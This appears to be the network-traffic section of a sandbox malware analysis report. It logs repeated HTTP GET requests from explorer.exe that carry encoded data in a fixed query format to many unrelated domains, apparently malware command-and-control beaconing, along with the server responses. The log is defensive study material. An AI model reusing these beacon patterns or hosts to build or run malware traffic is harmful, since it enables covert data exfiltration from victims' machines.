Apr 8, 2021 11:10:00.365288973 CEST | 1369 | OUT | GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1
  Host: www.jamessicilia.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Apr 8, 2021 11:10:00.582693100 CEST | 1370 | IN | HTTP/1.1 200 OK
  Date: Thu, 08 Apr 2021 09:10:00 GMT
  Server: Apache
  Set-Cookie: vsid=926vr3654186005020546; expires=Tue, 07-Apr-2026 09:10:00 GMT; Max-Age=157680000; path=/; domain=www.jamessicilia.com; HttpOnly
  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Ru1fD82/Yqs+3Zye7dtXUZ/oJiDw2u1OxPgHM8xCyLYyWaTMGCWQidzM+A86L7os7uHpkd6J4BLmsTmMgA8SfQ==
  Content-Length: 2559
  Keep-Alive: timeout=5, max=84
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8
  Data Ascii: ...top.location="http://www.jamessicilia.com/?fp=csMmVs%2F%2BKvHN4RPrdo5yUNu%2FaNbtxdJciSZCMiziJI1RzaFEhI4Z5eRmvj1JVCfI5xcdJaGDXoC3YgbFujzELkmBgV%2FvgcqyEcVuMDb43NU1KNZnjOjt6yS6yL2NQCRB8dbJySQOcoyOm3Lg%2Bv2y9dHjXCxUQXP86YDpQRogP4Y%3D&prvtof=dcaUoSL1QM06n8ST7rcIFyTahhUC61rKW2gcvfUvGH4%3D&poru=4PHHs34DjSgzjf1Avxst06L0%2Bb6v9DrHta3BhgX9AC0V9JDT3tXRkggSDReSral8Xbw75Zv7vtC37fENbEnJ%2F7XnBcLvh3wbjvbar7a0W%2F7wnfbEbAPWjlQftZlkv%2BvQzCBwFjJl37ic7uH4V%2FftpZCI9LeeAMUjG%2BjNogqmqeJmv9KoSH0J%2FMhjP6ecuo3M&cifr=1&JDK8ix=fhrZBjxaI0WDrOMMLB9i%2FeTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEA


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49727 | 23.227.38.74 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:10:05.937941074 CEST | 1395 | OUT | GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1
  Host: www.kinfet.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Apr 8, 2021 11:10:06.077676058 CEST | 1396 | IN | HTTP/1.1 403 Forbidden
  Date: Thu, 08 Apr 2021 09:10:06 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Vary: Accept-Encoding
  X-Sorting-Hat-PodId: -1
  X-Dc: gcp-us-east1
  X-Request-ID: da345f65-3dc9-46ad-8b16-fd94fcfb308a
  Set-Cookie: _shopify_fs=2021-04-08T09%3A10%3A06Z; Expires=Fri, 08-Apr-22 09:10:06 GMT; Domain=kinfet.com; Path=/; SameSite=Lax
  X-XSS-Protection: 1; mode=block
  X-Download-Options: noopen
  X-Content-Type-Options: nosniff
  X-Permitted-Cross-Domain-Policies: none
  CF-Cache-Status: DYNAMIC
  cf-request-id: 095258057e0000cc5abf907000000001
  Server: cloudflare
  CF-RAY: 63ca5c4f2f01cc5a-ZRH
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
  Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4r


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49744 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:11:04.175527096 CEST | 5167 | OUT | GET /evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu HTTP/1.1
  Host: www.curiosityisthecurebook.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Apr 8, 2021 11:11:04.291693926 CEST | 5167 | IN | HTTP/1.1 403 Forbidden
  Server: openresty
  Date: Thu, 08 Apr 2021 09:11:04 GMT
  Content-Type: text/html
  Content-Length: 275
  ETag: "6063a886-113"
  Via: 1.1 google
  Connection: close
  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49745 | 192.185.48.194 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:11:09.627645969 CEST | 5168 | OUT | GET /evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu HTTP/1.1
  Host: www.usinggroovefunnels.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Apr 8, 2021 11:11:09.776088953 CEST | 5169 | IN | HTTP/1.1 301 Moved Permanently
  Date: Thu, 08 Apr 2021 09:11:09 GMT
  Server: Apache
  Location: http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu
  Content-Length: 326
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&amp;w4=jFNp36Ihu">here</a>.</p></body></html>


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                        12          192.168.2.3  49746        34.102.136.180  80                C:\Windows\explorer.exe
                                                                        Timestamp                            kBytes transferred  Direction  Data
                                                                        Apr 8, 2021 11:11:14.840365887 CEST  5170                OUT        GET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.cgpizza.net
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:14.966414928 CEST  5170                IN         HTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 09:11:14 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "606abe1d-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                        13          192.168.2.3  49747        52.58.78.16     80                C:\Windows\explorer.exe
                                                                        Timestamp                            kBytes transferred  Direction  Data
                                                                        Apr 8, 2021 11:11:20.052567959 CEST  5171                OUT        GET /evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.physicalrobot.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:20.070189953 CEST  5172                IN         HTTP/1.1 410 Gone
                                                                        Server: openresty/1.13.6.2
                                                                        Date: Thu, 08 Apr 2021 09:10:31 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Ascii: 7<html>9 <head>51 <meta http-equiv='refresh' content='5; url=http://www.physicalrobot.com/' />a </head>9 <body>3d You are being redirected to http://www.physicalrobot.coma </body>8</html>0


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                        14          192.168.2.3  49748        208.91.197.91   80                C:\Windows\explorer.exe
                                                                        Timestamp                            kBytes transferred  Direction  Data
                                                                        Apr 8, 2021 11:11:25.228843927 CEST  5172                OUT        GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.jamessicilia.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:25.415476084 CEST  5174                IN         HTTP/1.1 200 OK
                                                                        Date: Thu, 08 Apr 2021 09:11:25 GMT
                                                                        Server: Apache
                                                                        Set-Cookie: vsid=928vr3654186853404344; expires=Tue, 07-Apr-2026 09:11:25 GMT; Max-Age=157680000; path=/; domain=www.jamessicilia.com; HttpOnly
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Ru1fD82/Yqs+3Zye7dtXUZ/oJiDw2u1OxPgHM8xCyLYyWaTMGCWQidzM+A86L7os7uHpkd6J4BLmsTmMgA8SfQ==
                                                                        Content-Length: 2565
                                                                        Keep-Alive: timeout=5, max=123
                                                                        Connection: Keep-Alive
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Data Ascii: ...top.location="http://www.jamessicilia.com/?fp=xiw7azCzKz1%2BXVVj2lgkK%2BemjZYd4f8F1YHudC4CBU2W%2FBcL9X8%2BRXqi4uaDRDzqEMVKC2adjYszRY53zDcB2cFJ107GDMDrJAROK0EoqUdrH6EfNO77ec4KStV7QOj9XrlxfOhliIx%2BMfALJ6Iekk%2BchDhW2SGsyYuPRnPlo%2Fk%3D&prvtof=CdhgCFl6KwdbWl9rZljIZIJGZxb6cdp0Hg%2FnSVrWLLY%3D&poru=MRcv008CmOPR47eUZFo%2BAQyIVoGxWQgMueZQO0LXswpNFIzcG89UfhctA7vte8ZkFTxfBNr8p%2B7eEZDjNEOOHWFxPTfv0Lfu%2BaYTzhJhcXXF%2BmWdcsQJ8rgMI3I5iwnoJ7XRD0pz3OWHvnKezUudTwEChHnKecMuQwq5wwSbFCCTsum3g09QLlRdKSOEnnny&cifr=1&JDK8ix=fhrZBjxaI0WDrOMMLB9i%2FeTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwE


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                        15          192.168.2.3  49749        23.227.38.74    80                C:\Windows\explorer.exe
                                                                        Timestamp                            kBytes transferred  Direction  Data
                                                                        Apr 8, 2021 11:11:30.437684059 CEST  5177                OUT        GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.kinfet.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:30.573548079 CEST  5178                IN         HTTP/1.1 403 Forbidden
                                                                        Date: Thu, 08 Apr 2021 09:11:30 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        X-Sorting-Hat-PodId: -1
                                                                        X-Dc: gcp-us-east1
                                                                        X-Request-ID: be2a510c-ab66-4b1d-9209-9129da9b5271
                                                                        Set-Cookie: _shopify_fs=2021-04-08T09%3A11%3A30Z; Expires=Fri, 08-Apr-22 09:11:30 GMT; Domain=kinfet.com; Path=/; SameSite=Lax
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-Download-Options: noopen
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 0952594f8f000023f7b5019000000001
                                                                        Server: cloudflare
                                                                        CF-RAY: 63ca5e5f4d0b23f7-ZRH
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4r


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                        2           192.168.2.3  49728        45.82.188.40    80                C:\Windows\explorer.exe
                                                                        Timestamp                            kBytes transferred  Direction  Data
                                                                        Apr 8, 2021 11:10:11.923106909 CEST  1402                OUT        GET /evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.productsoffholland.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:11.952156067 CEST  1403                IN         HTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Content-Length: 706
                                                                        Date: Thu, 08 Apr 2021 09:10:11 GMT
                                                                        Server: LiteSpeed
                                                                        Location: https://www.productsoffholland.com/evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu
                                                                        X-Powered-By: PleskLin
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                        3           192.168.2.3  49729        35.240.239.44   80                C:\Windows\explorer.exe
                                                                        Timestamp                            kBytes transferred  Direction  Data
                                                                        Apr 8, 2021 11:10:17.300426006 CEST  1404                OUT        GET /evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.markmalls.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:17.568883896 CEST  1405                IN         HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 09:10:17 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.markmalls.com/evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                        4           192.168.2.3  49731        52.15.160.167   80                C:\Windows\explorer.exe
                                                                        Timestamp                            kBytes transferred  Direction  Data
                                                                        Apr 8, 2021 11:10:22.820638895 CEST  1472                OUT        GET /evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.zhuledao.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:22.931658030 CEST  1474                IN         HTTP/1.1 404 Not Found
                                                                        Date: Thu, 08 Apr 2021 09:10:22 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 153
                                                                        Connection: close
                                                                        Server: nginx/1.16.1
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                        5           192.168.2.3  49737        52.216.152.43   80                C:\Windows\explorer.exe
                                                                        Timestamp                            kBytes transferred  Direction  Data
                                                                        Apr 8, 2021 11:10:28.155589104 CEST  5110                OUT        GET /evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.jcernadas.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:28.264857054 CEST  5111                IN         HTTP/1.1 301 Moved Permanently
                                                                        x-amz-id-2: srg1ay+sKorhhQOGuNMizeaej2IzVeRVjl1MFuHTKFT1bmsVZFO6RdEeFj/WVvZumv+oGef+d2U=
                                                                        x-amz-request-id: J17M5QFC7RV0ZT9A
                                                                        Date: Thu, 08 Apr 2021 09:10:29 GMT
                                                                        Location: http://jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu
                                                                        Content-Length: 0
                                                                        Server: AmazonS3
                                                                        Connection: close


                                                                        Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                                                        6           192.168.2.3  49738        198.185.159.144  80                C:\Windows\explorer.exe
                                                                        Timestamp                            kBytes transferred  Direction  Data
                                                                        Apr 8, 2021 11:10:38.489486933 CEST  5112                OUT        GET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.theholisticbirthco.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:38.605370045 CEST  5114                IN         HTTP/1.1 400 Bad Request
                                                                        Cache-Control: no-cache, must-revalidate
                                                                        Content-Length: 77564
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Date: Thu, 08 Apr 2021 09:10:38 UTC
                                                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                        Pragma: no-cache
                                                                        Server: Squarespace
                                                                        X-Contextid: yF5waueG/2beIt67k
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 
3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


Session ID: 7
Source IP: 192.168.2.3
Source Port: 49739
Destination IP: 80.67.16.8
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Apr 8, 2021 11:10:48.780775070 CEST | kBytes transferred: 5144 | Direction: OUT
Data: GET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1
Host: www.tor-one.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Apr 8, 2021 11:10:48.808635950 CEST | kBytes transferred: 5144 | Direction: IN
Data: HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 08 Apr 2021 09:10:48 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://leere.seite
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 8
Source IP: 192.168.2.3
Source Port: 49740
Destination IP: 188.93.150.75
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Apr 8, 2021 11:10:53.912617922 CEST | kBytes transferred: 5146 | Direction: OUT
Data: GET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1
Host: www.de-knutselkeet.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Apr 8, 2021 11:10:53.936810970 CEST | kBytes transferred: 5146 | Direction: IN
Data: HTTP/1.1 301 Moved Permanently
Date: Thu, 08 Apr 2021 09:10:53 GMT
Server: Apache/2.4.10
Location: https://www.skkek.nl/wp/de-knutselkeet/
Content-Length: 247
Connection: close
Content-Type: text/html; charset=iso-8859-1
